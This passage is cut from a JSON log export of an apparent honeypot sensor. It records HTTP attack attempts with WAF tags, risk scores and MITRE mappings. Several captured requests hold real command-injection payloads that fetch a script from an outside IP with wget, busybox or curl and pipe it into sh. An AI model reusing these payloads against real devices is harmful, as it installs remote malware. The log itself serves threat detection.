72}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:8081","http_user_agent":null,"http_referer":null,"tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_ssrf_body\u0022, \u0022net_web_probe\u0022]","anomalies":"[]","severity":10,"bytes_in":438},{"id":11446354,"ip":"45.153.34.252","ts":"2026-07-12 16:34:44.000000","proto":"tcp","src_port":42976,"dst_port":8081,"service":"http","classification":"cmd_injection","waf_score":47,"waf_tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022]","http_method":"POST","http_target":"\/cgi-bin\/remote_help-cgi","sensor_id":"paris-1","meta":"{\u0022protocol_emulated\u0022: true, \u0022emulator_response\u0022: \u0022485454502f312e3120323030204f4b0d0a5365727665723a204170616368652f322e342e35370d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b\u0022, \u0022emulator_response_len\u0022: 82, \u0022http_header_count\u0022: 4, \u0022http_query_params\u0022: 0, \u0022http_path_depth\u0022: 2, \u0022http_path_ext\u0022: null, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u00221994c0ff95f3f16c5fa9177d852edc4f1a4a8a24\u0022, \u0022http_target_hash\u0022: \u00224470cfe23acda62fbb5ae9d06314c68f4f66bdc0\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022POST\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 318, \u0022payload_entropy\u0022: 5.229869844627455, \u0022port_category\u0022: \u0022registered\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 8081, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 85.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 43.0, \u0022risk_novelty\u0022: 25.0, \u0022risk_boost\u0022: 15, \u0022risk_granularity\u0022: 6.4, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0}, \u0022risk_score\u0022: 82, \u0022tag_count\u0022: 15, \u0022anomaly_count\u0022: 0, \u0022campaign_key\u0022: \u0022bf38ea8cef8d51c26c553a16765c473947b2c4c8\u0022, \u0022event_fingerprint\u0022: \u0022f32ef2f7bcf61ba88cea0548e8950d59b494b854\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022confidence\u0022: 1.0, \u0022classification_confidence\u0022: 1.0, \u0022precision_score\u0022: 446, \u0022precision_signals\u0022: [\u0022MITRE-T1059\u0022, \u0022INT-http_cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022], \u0022kb_rule_ids\u0022: [\u0022MITRE-T1059\u0022, \u0022INT-http_cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022], \u0022matched_patterns\u0022: [\u0022pat-0842\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022, \u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022CRS 921130 duplicate CL\u0022, \u0022CRS 932100 cmd exec\u0022, \u0022CRS 932120 pipe chain\u0022, \u0022CRS 932200\u0022, \u0022CRS 932205\u0022, \u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0842\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022, \u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 82}, \u0022named_classification_skipped\u0022: false, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 100.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u0022ad7ed13e421fd25bc2f443a920ce627d\u0022, \u0022path_pattern_hash\u0022: \u0022081a0659a19fb0d32ca77af7f68355fe\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 82}, \u0022payload_preview\u0022: \u0022POST \/cgi-bin\/remote_help-cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: \u0022, \u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/cgi-bin\/remote_help-cgi\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/cgi-bin\/remote_help-cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/cgi-bin\/remote_help-cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 164\\r\\nConnection: close\\r\\n\\r\\ncmd=`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s zyxrh;busybox wget http:\/\/91.92.40.118\/wget.sh\u0022, \u0022payload_snippet\u0022: \u0022POST \/cgi-bin\/remote_help-cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length:\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/cgi-bin\/remote_help-cgi\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/cgi-bin\/remote_help-cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/cgi-bin\/remote_help-cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 164\\r\\nConnection: close\\r\\n\\r\\ncmd=`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s zyxrh;busybox wget http:\/\/91.92.40.118\/wget.sh\u0022, \u0022payload_snippet\u0022: \u0022POST \/cgi-bin\/remote_help-cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length:\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre_techniques\u0022: [\u0022T1059\u0022, \u0022T1190\u0022], \u0022mitre\u0022: \u0022T1059\u0022, \u0022threat_family\u0022: [\u0022rce_probe\u0022, \u0022ssrf_probe\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u0022679e1f090d2f205a9d0d6e13b2a10bdbceb0911c\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/cgi-bin\/remote_help-cgi\u0022, \u0022request_line\u0022: \u0022POST \/cgi-bin\/remote_help-cgi HTTP\/1.1\u0022, \u0022port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022POST \/cgi-bin\/remote_help-cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length:\u0022, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:8081 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/cgi-bin\/remote_help-cgi\u0022, \u0022target_port_label\u0022: \u00228081 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 82\/100 (\u00c9lev\u00e9) \u2014 MITRE T1059 \u2014 confiance 100 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 100, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 82}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 82, \u0022risk_label\u0022: \u0022\u00c9lev\u00e9\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 8081, \u0022protocol_emulated\u0022: true, \u0022tags_summary\u0022: [\u0022MITRE-T1059\u0022, \u0022INT-http_cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022MITRE-T1059\u0022, \u0022Http Cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022T1059\u0022, \u0022mitre_technique\u0022: \u0022T1059\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/cgi-bin\/remote_help-cgi\u0022, \u0022request_line\u0022: \u0022POST \/cgi-bin\/remote_help-cgi HTTP\/1.1\u0022, \u0022port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:8081 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/cgi-bin\/remote_help-cgi\u0022, \u0022evidence_snippet\u0022: \u0022POST \/cgi-bin\/remote_help-cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length:\u0022, \u0022target_port_label\u0022: \u00228081 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 100 % \u2014 Score WAF 100 \u00b7 7 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u00228081\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_probe_cgi_bin\u0022, \u0022http_sensitive_path\u0022, \u0022http_ssrf_body\u0022, \u0022iot_http_endpoint\u0022, \u0022net_web_probe\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:8081","http_user_agent":null,"http_referer":null,"tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_probe_cgi_bin\u0022, \u0022http_sensitive_path\u0022, \u0022http_ssrf_body\u0022, \u0022iot_http_endpoint\u0022, \u0022net_web_probe\u0022]","anomalies":"[]","severity":10,"bytes_in":318},{"id":11446355,"ip":"45.153.34.252","ts":"2026-07-12 16:34:44.000000","proto":"tcp","src_port":42988,"dst_port":8081,"service":"http","classification":"config_file_probe","waf_score":60,"waf_tags":"[\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022950629:webshell-param-cmd\u0022]","http_method":"GET","http_target":"\/cgi-bin\/account_mgr.cgi?cmd=cgi_user_add\u0026name=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dlnas%60","sensor_id":"paris-1","meta":"{\u0022protocol_emulated\u0022: true, \u0022emulator_response\u0022: \u0022485454502f312e3120323030204f4b0d0a5365727665723a204170616368652f322e342e35370d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b\u0022, \u0022emulator_response_len\u0022: 82, \u0022http_header_count\u0022: 2, \u0022http_query_params\u0022: 2, \u0022http_path_depth\u0022: 2, \u0022http_path_ext\u0022: \u0022cgi\u0022, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u00221994c0ff95f3f16c5fa9177d852edc4f1a4a8a24\u0022, \u0022http_target_hash\u0022: \u0022099cdff692d53e863101007eec84a42f224aacbc\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022GET\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 308, \u0022payload_entropy\u0022: 5.19407812495101, \u0022port_category\u0022: \u0022registered\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 8081, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 74.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 43.0, \u0022risk_novelty\u0022: 30.0, \u0022risk_boost\u0022: 0, \u0022risk_granularity\u0022: 6.4, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 74.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 30.0}, \u0022risk_score\u0022: 64, \u0022tag_count\u0022: 17, \u0022anomaly_count\u0022: 1, \u0022campaign_key\u0022: \u002257d3e152325878e5e1059b9f3d5c5671526af71e\u0022, \u0022event_fingerprint\u0022: \u0022becf8f8d5e72f307b25a09d3a92570d34aebd172\u0022, \u0022classification_reason\u0022: \u0022Sonde fichier sensible: chemin sensible (tag interne) \u00b7 R\u00e8gle WAF \u00ab lfi-12 \u00bb \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 100%\u0022, \u0022confidence\u0022: 1.0, \u0022classification_confidence\u0022: 1.0, \u0022precision_score\u0022: 127, \u0022precision_signals\u0022: [\u0022INT-http_sensitive\u0022, \u0022INT-upstream\u0022, \u0022INT-waf-score\u0022], \u0022kb_rule_ids\u0022: [\u0022INT-http_sensitive\u0022, \u0022INT-upstream\u0022, \u0022INT-waf-score\u0022], \u0022matched_patterns\u0022: [\u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 74.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 30.0, \u0022risk_score\u0022: 64}, \u0022named_classification_skipped\u0022: false, \u0022classification_parent\u0022: \u0022backup_file_scan\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 100.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u0022a54c28e76b3b5cc42ac12b2dc1912495\u0022, \u0022path_pattern_hash\u0022: \u0022d878a82020fc023d6ee51e23ab301813\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 64}, \u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dlnas%60\u0022, \u0022query_string\u0022: \u0022cmd=cgi_user_add\u0026name=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dlnas%60\u0022, \u0022waf_tags\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022950629:webshell-param-cmd\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022redir-1\u0022, \u0022webshell-param-cmd\u0022], \u0022request_line\u0022: \u0022GET \/cgi-bin\/account_mgr.cgi?cmd=cgi_user_add\u0026name=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dlnas%60 HTTP\/1.1\u0022, \u0022payload_snippet\u0022: \u0022GET \/cgi-bin\/account_mgr.cgi?cmd=cgi_user_add\u0026name=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bb\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dlnas%60\u0022, \u0022query_string\u0022: \u0022cmd=cgi_user_add\u0026name=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dlnas%60\u0022, \u0022waf_tags\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022950629:webshell-param-cmd\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022redir-1\u0022, \u0022webshell-param-cmd\u0022], \u0022request_line\u0022: \u0022GET \/cgi-bin\/account_mgr.cgi?cmd=cgi_user_add\u0026name=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dlnas%60 HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022GET \/cgi-bin\/account_mgr.cgi?cmd=cgi_user_add\u0026name=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dlnas%60 HT\u0022, \u0022payload_snippet\u0022: \u0022GET \/cgi-bin\/account_mgr.cgi?cmd=cgi_user_add\u0026name=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bb\u0022, \u0022classification_reason\u0022: \u0022Sonde fichier sensible: chemin sensible (tag interne) \u00b7 R\u00e8gle WAF \u00ab lfi-12 \u00bb \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 100%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre_techniques\u0022: [\u0022T1083\u0022], \u0022mitre\u0022: \u0022T1083\u0022, \u0022threat_family\u0022: [\u0022path_traversal\u0022, \u0022config_leak_scan\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u002270221a14dfe7ca42d5308d88b39ea6fd2a9799ff\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dlnas%\u2026\u0022, \u0022request_line\u0022: \u0022GET \/cgi-bin\/account_mgr.cgi?cmd=cgi_user_add\u0026name=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bc\u2026\u0022, \u0022port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022GET \/cgi-bin\/account_mgr.cgi?cmd=cgi_user_add\u0026name=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bb\u0022, \u0022attack_vector\u0022: \u0022config file probe \u00b7 via HTTP:8081 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bbusybox%20wg\u2026\u0022, \u0022target_port_label\u0022: \u00228081 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 9 tag(s) WAF\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Sonde fichier sensible: chemin sensible (tag interne) \u00b7 R\u00e8gle WAF \u00ab lfi-12 \u00bb \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 100%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Sonde fichier sensible: chemin sensible (tag interne) \u00b7 R\u00e8gle WAF \u00ab lfi-12 \u00bb \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 100%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 64\/100 (Moyen) \u2014 MITRE T1083 \u2014 confiance 100 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 100, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 74.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, 